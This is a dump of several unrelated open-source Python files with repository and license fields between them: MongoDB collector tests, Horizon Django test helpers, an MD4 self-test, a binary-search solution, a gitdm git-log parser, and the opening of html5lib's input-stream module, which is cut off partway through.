    """Decorator: run *func* only when the pymongo package is importable."""
    try:
        import pymongo
        pymongo  # workaround for pyflakes issue #13
    except ImportError:
        pymongo = None

    # A named function instead of an assigned lambda (PEP 8 / E731).
    def pred():
        return pymongo is not None
    return run_only(func, pred)
class TestMongoDBCollector(CollectorTestCase):
    """Tests for MongoDBCollector against a single mocked mongod host.

    'databases': '^db' restricts collection to database names matching the
    regex, so 'db1' is collected while 'baddb' must be ignored.
    """
    def setUp(self):
        config = get_collector_config('MongoDBCollector', {
            'host': 'localhost:27017',
            'databases': '^db',
        })
        self.collector = MongoDBCollector(config, None)
        self.connection = MagicMock()
    def test_import(self):
        self.assertTrue(MongoDBCollector)
    @run_only_if_pymongo_is_available
    @patch('pymongo.Connection')
    @patch.object(Collector, 'publish')
    def test_should_publish_nested_keys_for_server_stats(self,
                                                         publish_mock,
                                                         connector_mock):
        # Nested dicts are flattened to dotted metric names; non-numeric
        # values ('string') must not be published.
        data = {'more_keys': {'nested_key': 1}, 'key': 2, 'string': 'str'}
        self._annotate_connection(connector_mock, data)
        self.collector.collect()
        self.connection.db.command.assert_called_once_with('serverStatus')
        self.assertPublishedMany(publish_mock, {
            'more_keys.nested_key': 1,
            'key': 2
        })
    @run_only_if_pymongo_is_available
    @patch('pymongo.Connection')
    @patch.object(Collector, 'publish')
    def test_should_publish_nested_keys_for_db_stats(self,
                                                     publish_mock,
                                                     connector_mock):
        data = {'db_keys': {'db_nested_key': 1}, 'dbkey': 2, 'dbstring': 'str'}
        self._annotate_connection(connector_mock, data)
        self.collector.collect()
        self.connection['db1'].command.assert_called_once_with('dbStats')
        metrics = {
            'db_keys.db_nested_key': 1,
            'dbkey': 2
        }
        self.setDocExample(collector=self.collector.__class__.__name__,
                           metrics=metrics,
                           defaultpath=self.collector.config['path'])
        self.assertPublishedMany(publish_mock, metrics)
    @run_only_if_pymongo_is_available
    @patch('pymongo.Connection')
    @patch.object(Collector, 'publish')
    def test_should_publish_stats_with_long_type(self,
                                                 publish_mock,
                                                 connector_mock):
        # long() is Python 2 only; this suite predates Python 3 support.
        data = {'more_keys': long(1), 'key': 2, 'string': 'str'}
        self._annotate_connection(connector_mock, data)
        self.collector.collect()
        self.connection.db.command.assert_called_once_with('serverStatus')
        self.assertPublishedMany(publish_mock, {
            'more_keys': 1,
            'key': 2
        })
    @run_only_if_pymongo_is_available
    @patch('pymongo.Connection')
    @patch.object(Collector, 'publish')
    def test_should_ignore_unneeded_databases(self,
                                              publish_mock,
                                              connector_mock):
        self._annotate_connection(connector_mock, {})
        self.collector.collect()
        assert call('baddb') not in self.connection.__getitem__.call_args_list
    @run_only_if_pymongo_is_available
    @patch('pymongo.Connection')
    @patch.object(Collector, 'publish')
    def test_should_ignore_unneeded_collections(self,
                                                publish_mock,
                                                connector_mock):
        # Temporary map/reduce collections (tmp.mr.*) must not be queried.
        data = {'more_keys': long(1), 'key': 2, 'string': 'str'}
        self._annotate_connection(connector_mock, data)
        self.connection['db1'].collection_names.return_value = ['collection1',
                                                                'tmp.mr.tmp1']
        self.connection['db1'].command.return_value = {'key': 2,
                                                       'string': 'str'}
        self.collector.collect()
        self.connection.db.command.assert_called_once_with('serverStatus')
        self.connection['db1'].collection_names.assert_called_once_with()
        self.connection['db1'].command.assert_any_call('dbStats')
        self.connection['db1'].command.assert_any_call('collstats',
                                                       'collection1')
        assert call('collstats', 'tmp.mr.tmp1') not in \
            self.connection['db1'].command.call_args_list
        metrics = {
            'databases.db1.collection1.key': 2,
        }
        self.assertPublishedMany(publish_mock, metrics)
    def _annotate_connection(self, connector_mock, data):
        # Wire the patched pymongo.Connection to our shared MagicMock and
        # give it a deterministic command result and database list.
        connector_mock.return_value = self.connection
        self.connection.db.command.return_value = data
        self.connection.database_names.return_value = ['db1', 'baddb']
class TestMongoMultiHostDBCollector(CollectorTestCase):
    """Tests for MongoDBCollector with multiple hosts configured.

    Metrics are expected to be prefixed with a sanitized host_port
    (e.g. 'localhost_27017.') for each configured host.
    """
    def setUp(self):
        config = get_collector_config('MongoDBCollector', {
            'hosts': ['localhost:27017', 'localhost:27057'],
            'databases': '^db',
        })
        self.collector = MongoDBCollector(config, None)
        self.connection = MagicMock()
    def test_import(self):
        self.assertTrue(MongoDBCollector)
    @run_only_if_pymongo_is_available
    @patch('pymongo.Connection')
    @patch.object(Collector, 'publish')
    def test_should_publish_nested_keys_for_server_stats(self,
                                                         publish_mock,
                                                         connector_mock):
        data = {'more_keys': {'nested_key': 1}, 'key': 2, 'string': 'str'}
        self._annotate_connection(connector_mock, data)
        self.collector.collect()
        # assert_called_with (not once): the command runs once per host.
        self.connection.db.command.assert_called_with('serverStatus')
        self.assertPublishedMany(publish_mock, {
            'localhost_27017.more_keys.nested_key': 1,
            'localhost_27057.more_keys.nested_key': 1,
            'localhost_27017.key': 2,
            'localhost_27057.key': 2
        })
    @run_only_if_pymongo_is_available
    @patch('pymongo.Connection')
    @patch.object(Collector, 'publish')
    def test_should_publish_nested_keys_for_db_stats(self,
                                                     publish_mock,
                                                     connector_mock):
        data = {'db_keys': {'db_nested_key': 1}, 'dbkey': 2, 'dbstring': 'str'}
        self._annotate_connection(connector_mock, data)
        self.collector.collect()
        self.connection['db1'].command.assert_called_with('dbStats')
        metrics = {
            'localhost_27017.db_keys.db_nested_key': 1,
            'localhost_27057.db_keys.db_nested_key': 1,
            'localhost_27017.dbkey': 2,
            'localhost_27057.dbkey': 2
        }
        self.setDocExample(collector=self.collector.__class__.__name__,
                           metrics=metrics,
                           defaultpath=self.collector.config['path'])
        self.assertPublishedMany(publish_mock, metrics)
    @run_only_if_pymongo_is_available
    @patch('pymongo.Connection')
    @patch.object(Collector, 'publish')
    def test_should_publish_stats_with_long_type(self,
                                                 publish_mock,
                                                 connector_mock):
        # long() is Python 2 only; this suite predates Python 3 support.
        data = {'more_keys': long(1), 'key': 2, 'string': 'str'}
        self._annotate_connection(connector_mock, data)
        self.collector.collect()
        self.connection.db.command.assert_called_with('serverStatus')
        self.assertPublishedMany(publish_mock, {
            'localhost_27017.more_keys': 1,
            'localhost_27057.more_keys': 1,
            'localhost_27017.key': 2,
            'localhost_27057.key': 2
        })
    @run_only_if_pymongo_is_available
    @patch('pymongo.Connection')
    @patch.object(Collector, 'publish')
    def test_should_ignore_unneeded_databases(self,
                                              publish_mock,
                                              connector_mock):
        self._annotate_connection(connector_mock, {})
        self.collector.collect()
        assert call('baddb') not in self.connection.__getitem__.call_args_list
    @run_only_if_pymongo_is_available
    @patch('pymongo.Connection')
    @patch.object(Collector, 'publish')
    def test_should_ignore_unneeded_collections(self,
                                                publish_mock,
                                                connector_mock):
        # Temporary map/reduce collections (tmp.mr.*) must not be queried.
        data = {'more_keys': long(1), 'key': 2, 'string': 'str'}
        self._annotate_connection(connector_mock, data)
        self.connection['db1'].collection_names.return_value = ['collection1',
                                                                'tmp.mr.tmp1']
        self.connection['db1'].command.return_value = {'key': 2,
                                                       'string': 'str'}
        self.collector.collect()
        self.connection.db.command.assert_called_with('serverStatus')
        self.connection['db1'].collection_names.assert_called_with()
        self.connection['db1'].command.assert_any_call('dbStats')
        self.connection['db1'].command.assert_any_call('collstats',
                                                       'collection1')
        assert call('collstats', 'tmp.mr.tmp1') not in \
            self.connection['db1'].command.call_args_list
        metrics = {
            'localhost_27017.databases.db1.collection1.key': 2,
            'localhost_27057.databases.db1.collection1.key': 2,
        }
        self.assertPublishedMany(publish_mock, metrics)
    def _annotate_connection(self, connector_mock, data):
        # Wire the patched pymongo.Connection to our shared MagicMock and
        # give it a deterministic command result and database list.
        connector_mock.return_value = self.connection
        self.connection.db.command.return_value = data
        self.connection.database_names.return_value = ['db1', 'baddb']
################################################################################
if __name__ == "__main__":
unittest.main()
| mit |
deepakselvaraj/federated-horizon | horizon/test/helpers.py | 1 | 7377 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
import socket
from django.contrib.auth.middleware import AuthenticationMiddleware # noqa
from django.contrib.auth.models import Permission # noqa
from django.contrib.auth.models import User # noqa
from django.contrib.contenttypes.models import ContentType # noqa
from django.contrib.messages.storage import default_storage # noqa
from django.core.handlers import wsgi
from django import http
from django import test as django_test
from django.test.client import RequestFactory # noqa
from django.utils import unittest
LOG = logging.getLogger(__name__)
try:
from selenium.webdriver.firefox.webdriver import WebDriver # noqa
from selenium.webdriver.support import ui as selenium_ui
except ImportError as e:
# NOTE(saschpe): Several distribution can't ship selenium due to it's
# non-free license. So they have to patch it out of test-requirements.txt
# Avoid import failure and force not running selenium tests.
LOG.warning("{0}, force WITH_SELENIUM=False".format(str(e)))
os.environ['WITH_SELENIUM'] = ''
import mox
from horizon import middleware
# Makes output of failing mox tests much easier to read.
wsgi.WSGIRequest.__repr__ = lambda self: "<class 'django.http.HttpRequest'>"
class RequestFactoryWithMessages(RequestFactory):
    """RequestFactory whose requests support django.contrib.messages.

    GET and POST requests get a user, an (empty) session and a message
    storage attached, so code under test can use the messages framework
    without running the full middleware stack.
    """
    def _attach_messages(self, req):
        # Attach the minimum state contrib.messages expects on a request.
        req.user = User()
        req.session = []
        req._messages = default_storage(req)
        return req

    def get(self, *args, **kwargs):
        return self._attach_messages(
            super(RequestFactoryWithMessages, self).get(*args, **kwargs))

    def post(self, *args, **kwargs):
        return self._attach_messages(
            super(RequestFactoryWithMessages, self).post(*args, **kwargs))
@unittest.skipIf(os.environ.get('SKIP_UNITTESTS', False),
                 "The SKIP_UNITTESTS env variable is set.")
class TestCase(django_test.TestCase):
    """
    Specialized base test case class for Horizon which gives access to
    numerous additional features:
    * The ``mox`` mocking framework via ``self.mox``.
    * A ``RequestFactory`` class which supports Django's ``contrib.messages``
    framework via ``self.factory``.
    * A ready-to-go request object via ``self.request``.
    """
    def setUp(self):
        # Fresh mox/factory per test, a logged-in test user, and a request
        # that has been run through Horizon's own middleware.
        self.mox = mox.Mox()
        self.factory = RequestFactoryWithMessages()
        self.user = User.objects.create_user(username='test', password='test')
        self.assertTrue(self.client.login(username="test", password="test"))
        self.request = http.HttpRequest()
        self.request.session = self.client._session()
        middleware.HorizonMiddleware().process_request(self.request)
        AuthenticationMiddleware().process_request(self.request)
        os.environ["HORIZON_TEST_RUN"] = "True"
    def tearDown(self):
        # VerifyAll() fails the test if any expected mock call was missed.
        self.mox.UnsetStubs()
        self.mox.VerifyAll()
        del os.environ["HORIZON_TEST_RUN"]
    def set_permissions(self, permissions=None):
        """Replace the test user's permissions with exactly *permissions*."""
        perm_ids = Permission.objects.values_list('id', flat=True)
        self.user.user_permissions.remove(*perm_ids)
        for name in permissions:
            ct, create = ContentType.objects.get_or_create(model=name,
                                                           app_label='horizon')
            perm, create = Permission.objects.get_or_create(codename=name,
                                                            content_type=ct,
                                                            name=name)
            self.user.user_permissions.add(perm)
        # Django caches permissions on the user object; drop the stale cache.
        if hasattr(self.user, "_perm_cache"):
            del self.user._perm_cache
    def assertNoMessages(self, response=None):
        """
        Asserts that no messages have been attached by the ``contrib.messages``
        framework.
        """
        self.assertMessageCount(response, success=0, warn=0, info=0, error=0)
    def assertMessageCount(self, response=None, **kwargs):
        """
        Asserts that the specified number of messages have been attached
        for various message types. Usage would look like
        ``self.assertMessageCount(success=1)``.
        """
        temp_req = self.client.request(**{'wsgi.input': None})
        temp_req.COOKIES = self.client.cookies
        storage = default_storage(temp_req)
        messages = []
        if response is None:
            # To gain early access to the messages we have to decode the
            # cookie on the test client.
            if 'messages' in self.client.cookies:
                message_cookie = self.client.cookies['messages'].value
                messages = storage._decode(message_cookie)
        # Check for messages in the context
        elif hasattr(response, "context") and "messages" in response.context:
            messages = response.context["messages"]
        # Check for messages attached to the request on a TemplateResponse
        elif hasattr(response, "_request") and hasattr(response._request,
                                                       "_messages"):
            messages = response._request._messages._queued_messages
        # If we don't have messages and we don't expect messages, we're done.
        if not any(kwargs.values()) and not messages:
            return
        # If we expected messages and have none, that's a problem.
        if any(kwargs.values()) and not messages:
            error_msg = "Messages were expected, but none were set."
            assert 0 == sum(kwargs.values()), error_msg
        # Otherwise, make sure we got the expected messages.
        for msg_type, count in kwargs.items():
            msgs = [m.message for m in messages if msg_type in m.tags]
            assert len(msgs) == count, \
                "%s messages not as expected: %s" % (msg_type.title(),
                                                     ", ".join(msgs))
@unittest.skipUnless(os.environ.get('WITH_SELENIUM', False),
                     "The WITH_SELENIUM env variable is not set.")
class SeleniumTestCase(django_test.LiveServerTestCase):
    """Live-server test case driving a real browser through Selenium.

    Skipped entirely (and the WebDriver never started) unless the
    WITH_SELENIUM environment variable is set.
    """
    @classmethod
    def setUpClass(cls):
        if os.environ.get('WITH_SELENIUM', False):
            cls.selenium = WebDriver()
        super(SeleniumTestCase, cls).setUpClass()
    @classmethod
    def tearDownClass(cls):
        if os.environ.get('WITH_SELENIUM', False):
            cls.selenium.quit()
        super(SeleniumTestCase, cls).tearDownClass()
    def setUp(self):
        # Fail fast rather than hang if the browser stops responding.
        socket.setdefaulttimeout(10)
        self.ui = selenium_ui
        super(SeleniumTestCase, self).setUp()
wemanuel/smry | smry/Crypto/SelfTest/Hash/test_MD4.py | 116 | 2368 | # -*- coding: utf-8 -*-
#
# SelfTest/Hash/MD4.py: Self-test for the MD4 hash function
#
# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Crypto.Hash.MD4"""
__revision__ = "$Id$"
from Crypto.Util.py3compat import *
# This is a list of (expected_result, input[, description]) tuples.
test_data = [
# Test vectors from RFC 1320
('31d6cfe0d16ae931b73c59d7e0c089c0', '', "'' (empty string)"),
('bde52cb31de33e46245e05fbdbd6fb24', 'a'),
('a448017aaf21d8525fc10ae87aa6729d', 'abc'),
('d9130a8164549fe818874806e1c7014b', 'message digest'),
('d79e1c308aa5bbcdeea8ed63df412da9', 'abcdefghijklmnopqrstuvwxyz',
'a-z'),
('043f8582f241db351ce627e153e7f0e4',
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789',
'A-Z, a-z, 0-9'),
('e33b4ddc9c38f2199c3e7b164fcc0536',
'1234567890123456789012345678901234567890123456'
+ '7890123456789012345678901234567890',
"'1234567890' * 8"),
]
def get_tests(config={}):
    """Build and return the MD4 self-test suite."""
    from Crypto.Hash import MD4
    from common import make_hash_tests
    md4_oid = "\x06\x08\x2a\x86\x48\x86\xf7\x0d\x02\x04"
    return make_hash_tests(MD4, "MD4", test_data,
                           digest_size=16, oid=md4_oid)
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
| apache-2.0 |
stonemary/lintcode_solutions | first-position-of-target/1-3.py | 1 | 1028 | # time 15
# 2:40
# improvement on the last version: prevent overflow
class Solution:
    # @param nums: The integer array
    # @param target: Target number to find
    # @return the first position of target in nums, position start from 0
    def binarySearch(self, nums, target):
        """Return the index of the first occurrence of target, or -1.

        Iterative binary search maintaining nums[start..end] as the
        candidate window while start + 1 < end; start is checked before end
        afterwards so the *first* matching position wins.
        """
        if not nums:
            return -1
        start, end = 0, len(nums) - 1
        while start + 1 < end:
            # // keeps integer division under Python 3 as well; the
            # start + (end - start) form avoids overflow in languages with
            # fixed-width ints (harmless in Python).
            mid = start + (end - start) // 2
            if nums[mid] < target:
                start = mid
            else:
                # On equality keep narrowing left to find the first position.
                end = mid
        if nums[start] == target:
            return start
        if nums[end] == target:
            return end
        return -1
| apache-2.0 |
pasinskim/integration | extra/gitdm/gitdm/gitlog.py | 2 | 5044 | #
# Stuff for dealing with the git log output.
#
# Someday this will be the only version of grabpatch, honest.
#
import re, rfc822, datetime
from patterns import patterns
import database
#
# Input file handling. Someday it would be good to make this smarter
# so that it handles running git with the right options and such.
#
# Someday.
#
# One-line pushback buffer shared with SaveLine().
SavedLine = ''

def getline(input):
    """Return the next input line, preferring a previously pushed-back one.

    Fresh lines come back right-stripped; a pushed-back line is returned
    verbatim. None signals end of input.
    """
    global SavedLine
    if SavedLine:
        line, SavedLine = SavedLine, ''
        return line
    line = input.readline()
    return line.rstrip() if line else None
def SaveLine(line):
    """Push *line* back so the next getline() call returns it unchanged."""
    global SavedLine
    SavedLine = line
#
# A simple state machine based on where we are in the patch. The
# first stuff we get is the header.
#
S_HEADER = 0
#
# Then comes the single-line description.
#
S_DESC = 1
#
# ...the full changelog...
#
S_CHANGELOG = 2
#
# ...the tag section....
#
S_TAGS = 3
#
# ...the numstat section.
#
S_NUMSTAT = 4
S_DONE = 5
#
# The functions to handle each of these states.
#
def get_header(patch, line, input):
    """Header state: pick up Author/Date lines until the blank separator.

    Returns the next parser state: S_DESC once the blank line ending the
    header is seen, otherwise S_HEADER.
    """
    if line == '':
        # End of header; fall back to an "Unknown" hacker if no author line
        # was found.
        if patch.author == '':
            print 'Funky auth line in', patch.commit
            patch.author = database.LookupStoreHacker('Unknown',
                                                      'unknown@hacker.net')
        return S_DESC
    m = patterns['author'].match(line)
    if m:
        patch.email = database.RemapEmail(m.group(2))
        patch.author = database.LookupStoreHacker(m.group(1), patch.email)
    else:
        m = patterns['date'].match(line)
        if m:
            dt = rfc822.parsedate(m.group(2))
            patch.date = datetime.date(dt[0], dt[1], dt[2])
    return S_HEADER
def get_desc(patch, line, input):
    """Description state: collect the (possibly wrapped) one-line summary.

    Consumes continuation lines until a blank line, then moves to the
    changelog state.
    """
    if not line:
        print 'Missing desc in', patch.commit
        return S_CHANGELOG
    patch.desc = line
    line = getline(input)
    while line:
        patch.desc += line
        line = getline(input)
    return S_CHANGELOG
tagline = re.compile(r'^\s+(([-a-z]+-by)|cc|fixes):.*$', re.I)
def get_changelog(patch, line, input):
    """Changelog state: buffer body text until tags or the next commit.

    Paragraphs are staged in patch.templog and flushed to patch.changelog
    at blank lines (or when the tag section begins), so a trailing tag
    block is not mistaken for changelog text.
    """
    if not line:
        if patch.templog:
            patch.changelog += patch.templog
            patch.templog = ''
    if patterns['commit'].match(line):
        # No changelog at all - usually a Linus tag
        SaveLine(line)
        return S_DONE
    elif tagline.match(line):
        if patch.templog:
            patch.changelog += patch.templog
        return get_tag(patch, line, input)
    else:
        patch.templog += line + '\n'
    return S_CHANGELOG
def get_tag(patch, line, input):
    """Tag state: collect Signed-off-by and similar trailer lines.

    Leaves this state on the next commit line (pushed back for the caller)
    or on the first numstat line.
    """
    #
    # Some people put blank lines in the middle of tags.
    #
    if not line:
        return S_TAGS
    #
    # A new commit line says we've gone too far.
    #
    if patterns['commit'].match(line):
        SaveLine(line)
        return S_DONE
    #
    # Check for a numstat line
    #
    if patterns['numstat'].match(line):
        return get_numstat(patch, line, input)
    #
    # Look for interesting tags
    #
    m = patterns['signed-off-by'].match(line)
    if m:
        patch.signoffs.append(m.group(2))
    else:
        #
        # Look for other tags indicating that somebody at least
        # looked at the patch.
        #
        for tag in ('acked-by', 'reviewed-by', 'tested-by'):
            if patterns[tag].match(line):
                patch.othertags += 1
                break
    patch.taglines.append(line)
    return S_TAGS
def get_numstat(patch, line, input):
    """Numstat state: accumulate per-file added/removed line counts."""
    m = patterns['numstat'].match(line)
    if not m:
        return S_DONE
    try:
        patch.addfile(int(m.group(1)), int(m.group(2)), m.group(3))
    #
    # Binary files just have "-" in the line fields. In this case, set
    # the counts to zero so that we at least track that the file was
    # touched.
    #
    except ValueError:
        patch.addfile(0, 0, m.group(3))
    return S_NUMSTAT
grabbers = [ get_header, get_desc, get_changelog, get_tag, get_numstat ]
#
# A variant on the gitdm patch class.
#
class patch:
    """Accumulates everything gitdm tracks about a single commit."""

    def __init__(self, commit):
        self.commit = commit
        # Textual pieces of the commit message.
        self.desc = ''
        self.changelog = ''
        self.templog = ''
        # Authorship and review metadata.
        self.author = ''
        self.signoffs = []
        self.taglines = []
        self.othertags = 0
        # Aggregate diffstat information.
        self.added = self.removed = 0
        self.files = []

    def addfile(self, added, removed, file):
        """Record one numstat entry and update the aggregate counts."""
        self.added += added
        self.removed += removed
        self.files.append(file)
def grabpatch(input):
    """Read one commit's worth of lines from input and return a filled-in
    patch object, or None at EOF or on unexpected input."""
    #
    # If it's not a patch something is screwy.
    #
    line = getline(input)
    if line is None:
        return None
    m = patterns['commit'].match(line)
    if not m:
        print 'noncommit', line
        return None
    p = patch(m.group(1))
    state = S_HEADER
    #
    # Crank through the patch.
    #
    while state != S_DONE:
        line = getline(input)
        if line is None:
            # EOF is only legitimate once we have reached the numstat
            # section; anywhere else the patch is truncated.
            if state != S_NUMSTAT:
                print 'Ran out of patch', state
                return None
            return p
        state = grabbers[state](p, line, input)
    return p
| apache-2.0 |
jlegendary/servo | tests/wpt/css-tests/tools/html5lib/html5lib/inputstream.py | 618 | 30855 | from __future__ import absolute_import, division, unicode_literals
from six import text_type
from six.moves import http_client
import codecs
import re
from .constants import EOF, spaceCharacters, asciiLetters, asciiUppercase
from .constants import encodings, ReparseException
from . import utils
from io import StringIO
try:
from io import BytesIO
except ImportError:
BytesIO = StringIO
try:
from io import BufferedIOBase
except ImportError:
class BufferedIOBase(object):
pass
# Non-unicode versions of constants for use in the pre-parser
spaceCharactersBytes = frozenset([item.encode("ascii") for item in spaceCharacters])
asciiLettersBytes = frozenset([item.encode("ascii") for item in asciiLetters])
asciiUppercaseBytes = frozenset([item.encode("ascii") for item in asciiUppercase])
spacesAngleBrackets = spaceCharactersBytes | frozenset([b">", b"<"])
# Characters that must never appear in a document: C0/C1 controls (minus
# whitespace), lone surrogates, and the Unicode noncharacters.
invalid_unicode_re = re.compile("[\u0001-\u0008\u000B\u000E-\u001F\u007F-\u009F\uD800-\uDFFF\uFDD0-\uFDEF\uFFFE\uFFFF\U0001FFFE\U0001FFFF\U0002FFFE\U0002FFFF\U0003FFFE\U0003FFFF\U0004FFFE\U0004FFFF\U0005FFFE\U0005FFFF\U0006FFFE\U0006FFFF\U0007FFFE\U0007FFFF\U0008FFFE\U0008FFFF\U0009FFFE\U0009FFFF\U000AFFFE\U000AFFFF\U000BFFFE\U000BFFFF\U000CFFFE\U000CFFFF\U000DFFFE\U000DFFFF\U000EFFFE\U000EFFFF\U000FFFFE\U000FFFFF\U0010FFFE\U0010FFFF]")
# Supplementary-plane noncharacters, kept as integer code points for the
# narrow-build (UCS-2) error path, where they only exist as surrogate pairs.
non_bmp_invalid_codepoints = set([0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
                                  0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE, 0x5FFFF,
                                  0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE,
                                  0x8FFFF, 0x9FFFE, 0x9FFFF, 0xAFFFE, 0xAFFFF,
                                  0xBFFFE, 0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
                                  0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE, 0xFFFFF,
                                  0x10FFFE, 0x10FFFF])
ascii_punctuation_re = re.compile("[\u0009-\u000D\u0020-\u002F\u003A-\u0040\u005B-\u0060\u007B-\u007E]")
# Cache for charsUntil()
charsUntilRegEx = {}
class BufferedStream(object):
    """Buffering for streams that do not have buffering of their own
    The buffer is implemented as a list of chunks on the assumption that
    joining many strings will be slow since it is O(n**2)
    """
    def __init__(self, stream):
        self.stream = stream
        self.buffer = []  # previously-read chunks, in read order
        self.position = [-1, 0]  # chunk number, offset
    def tell(self):
        # Absolute position = length of all fully-consumed chunks plus the
        # offset into the current one.
        pos = 0
        for chunk in self.buffer[:self.position[0]]:
            pos += len(chunk)
        pos += self.position[1]
        return pos
    def seek(self, pos):
        # Only seeking within already-buffered data is supported.
        assert pos <= self._bufferedBytes()
        offset = pos
        i = 0
        while len(self.buffer[i]) < offset:
            offset -= len(self.buffer[i])
            i += 1
        self.position = [i, offset]
    def read(self, bytes):
        # Serve from the underlying stream when nothing is buffered or the
        # position is at the very end of the buffered data; otherwise
        # replay from the buffer.
        if not self.buffer:
            return self._readStream(bytes)
        elif (self.position[0] == len(self.buffer) and
              self.position[1] == len(self.buffer[-1])):
            return self._readStream(bytes)
        else:
            return self._readFromBuffer(bytes)
    def _bufferedBytes(self):
        # Total number of bytes held across all buffered chunks.
        return sum([len(item) for item in self.buffer])
    def _readStream(self, bytes):
        # Read a fresh chunk, remember it, and move the position past it.
        data = self.stream.read(bytes)
        self.buffer.append(data)
        self.position[0] += 1
        self.position[1] = len(data)
        return data
    def _readFromBuffer(self, bytes):
        # Satisfy as much of the request as possible from buffered chunks,
        # then fall through to the underlying stream for the remainder.
        remainingBytes = bytes
        rv = []
        bufferIndex = self.position[0]
        bufferOffset = self.position[1]
        while bufferIndex < len(self.buffer) and remainingBytes != 0:
            assert remainingBytes > 0
            bufferedData = self.buffer[bufferIndex]
            if remainingBytes <= len(bufferedData) - bufferOffset:
                bytesToRead = remainingBytes
                self.position = [bufferIndex, bufferOffset + bytesToRead]
            else:
                bytesToRead = len(bufferedData) - bufferOffset
                self.position = [bufferIndex, len(bufferedData)]
                bufferIndex += 1
            rv.append(bufferedData[bufferOffset:bufferOffset + bytesToRead])
            remainingBytes -= bytesToRead
            bufferOffset = 0
        if remainingBytes:
            rv.append(self._readStream(remainingBytes))
        return b"".join(rv)
def HTMLInputStream(source, encoding=None, parseMeta=True, chardet=True):
    """Return the appropriate input-stream wrapper for *source*: a
    HTMLUnicodeInputStream for text input, a HTMLBinaryInputStream for
    byte input (with encoding detection)."""
    if isinstance(source, http_client.HTTPResponse):
        # Work around Python bug #20007: read(0) closes the connection.
        # http://bugs.python.org/issue20007
        isUnicode = False
    else:
        # Probe a readable object via a zero-length read; otherwise
        # inspect the object itself.
        probe = source.read(0) if hasattr(source, "read") else source
        isUnicode = isinstance(probe, text_type)
    if not isUnicode:
        return HTMLBinaryInputStream(source, encoding, parseMeta, chardet)
    if encoding is not None:
        raise TypeError("Cannot explicitly set an encoding with a unicode string")
    return HTMLUnicodeInputStream(source)
class HTMLUnicodeInputStream(object):
    """Provides a unicode stream of characters to the HTMLTokenizer.
    This class takes care of character encoding and removing or replacing
    incorrect byte-sequences and also provides column and line tracking.
    """
    # Number of characters fetched from the underlying stream per readChunk().
    _defaultChunkSize = 10240
    def __init__(self, source):
        """Initialises the HTMLInputStream.
        HTMLInputStream(source, [encoding]) -> Normalized stream from source
        for use by html5lib.
        source can be either a file-object, local filename or a string.
        The optional encoding parameter must be a string that indicates
        the encoding. If specified, that encoding will be used,
        regardless of any BOM or later declaration (such as in a meta
        element)
        parseMeta - Look for a <meta> element containing encoding information
        """
        # Craziness: distinguish wide builds (U+0010FFFF is one code unit)
        # from narrow/UCS-2 builds (it is a surrogate pair); each needs its
        # own error reporting and surrogate-replacement regexp.
        if len("\U0010FFFF") == 1:
            self.reportCharacterErrors = self.characterErrorsUCS4
            self.replaceCharactersRegexp = re.compile("[\uD800-\uDFFF]")
        else:
            self.reportCharacterErrors = self.characterErrorsUCS2
            self.replaceCharactersRegexp = re.compile("([\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?<![\uD800-\uDBFF])[\uDC00-\uDFFF])")
        # List of where new lines occur
        self.newLines = [0]
        self.charEncoding = ("utf-8", "certain")
        self.dataStream = self.openStream(source)
        self.reset()
    def reset(self):
        # Discard all buffered state; a fresh chunk is read on demand.
        self.chunk = ""
        self.chunkSize = 0
        self.chunkOffset = 0
        self.errors = []
        # number of (complete) lines in previous chunks
        self.prevNumLines = 0
        # number of columns in the last line of the previous chunk
        self.prevNumCols = 0
        # Deal with CR LF and surrogates split over chunk boundaries
        self._bufferedCharacter = None
    def openStream(self, source):
        """Produces a file object from source.
        source can be either a file object, local filename or a string.
        """
        # Already a file object
        if hasattr(source, 'read'):
            stream = source
        else:
            stream = StringIO(source)
        return stream
    def _position(self, offset):
        """Return the 0-based (line, column) of `offset` within the current
        chunk, counted from the start of the stream."""
        chunk = self.chunk
        nLines = chunk.count('\n', 0, offset)
        positionLine = self.prevNumLines + nLines
        lastLinePos = chunk.rfind('\n', 0, offset)
        if lastLinePos == -1:
            # Still on the line the previous chunk ended on.
            positionColumn = self.prevNumCols + offset
        else:
            positionColumn = offset - (lastLinePos + 1)
        return (positionLine, positionColumn)
    def position(self):
        """Returns (line, col) of the current position in the stream."""
        line, col = self._position(self.chunkOffset)
        return (line + 1, col)
    def char(self):
        """ Read one character from the stream or queue if available. Return
